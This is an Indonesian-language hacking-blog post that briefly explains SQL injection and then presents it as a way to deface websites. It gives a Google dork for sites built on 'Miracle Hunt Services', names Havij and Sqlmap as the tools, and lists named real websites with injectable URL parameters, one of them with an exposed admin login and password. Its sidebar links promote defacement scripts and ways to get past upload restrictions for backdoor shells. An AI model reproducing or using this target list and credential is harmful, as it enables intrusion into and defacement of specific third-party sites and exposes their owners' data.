Miracle Hunt Services SQL Injection

Miracle Hunt Services SQL Injection

SQL injection adalah teknik hacking dalam keamanan komputer mana seorang penyerang bisa mendapatkan akses ke database dalam sistem dengan menyisipkan karakter khusus. Bisa mengatakan bahwa web target dapat terinfeksi, Anda perlu memasukkan karakter seperti (') atau tanda ganda minus (-) yang tidak dikenal dalam database mysql. Setelah berjalan di database, perintah dapat mengubah, menghapus, atau mengungkapkan data sensitif yang lebih buruk yang bisa mematikan database itu sendiri.

Penyebab terjadinya SQL Injection

- Tidak adanya penanganan karakter tanda petik satu ' dan juga karakter double minus - -.
- Jadi seorang attacker dapat menyisipkan perintah SQL ke dalam parameter atau Form.

Berikut ini adalah salah satu cara deface menggunakan teknik SQL Injection dengan menggunakan dork google.


Exploit Title : Miracle Hunt Services SQL Injection
Dork : "Powered by : Miracle Hunt Services"
Author : Magelang1337
Test : Havij / Sqlmap
Admin : Site.com/admin


Demo :
http://www.zedkitchen.com/service_details.php?id=7 | Username : info@ | Pass : zkit@101
http://www.sovereignenterprise.in/service-detail.php?serv=11
http://www.rajhanselectric.com/products.php?pro_subcat_hdr=69
http://sparkzelectro.com/service.php?sid=25
http://www.razzledazzlejewels.net/product.php?id=2  
http://www.digmanibedcollege.in/faculty.php?fpageid=1
http://jaiclasses.com/course_detail.php?id=3
http://devbhoomipharmaceuticals.com/products.php?data=7
http://shalengineers.in/product.php?id=129

★★★★

  • Script Deface Keren Terbaru 2022-2023
    Script Deface Keren Terbaru 2022-2023Magelang1337.com - Saat defacer merubah tampilan halaman menjadi hitam dengan kata-kata unik biasanya juga meninggalkan jejak seperti codename dan team name. T ...
  • Ada BUG Di Website Dpr.go.id !
    Ada BUG Di Website Dpr.go.id !Beberapa hari yang lalu di internet sedang viral tentang Hacker indonesia meretas website pemerintahan. Anda bisa membacanya disini Hacker meretas Website KPAI ...
  • Mengatasi Tamper Data Tidak Kompatibel
    Mengatasi Tamper Data Tidak KompatibelMozilla Firefox adalah aplikasi browser yang berjalan di berbagai sistem operasi seperti Windows dan Android. Browser ini adalah browser yang paling banyak dig ...
  • Cara Bypass File Restriction untuk Upload Shell Backdoor
    Cara Bypass File Restriction untuk Upload Shell BackdoorSalah satu cara deface yang paling berbahaya dalam Aplikasi website adalah Upload file. Dengan hasil mulai dari XSS hingga eksekusi code script, Upload file ad ...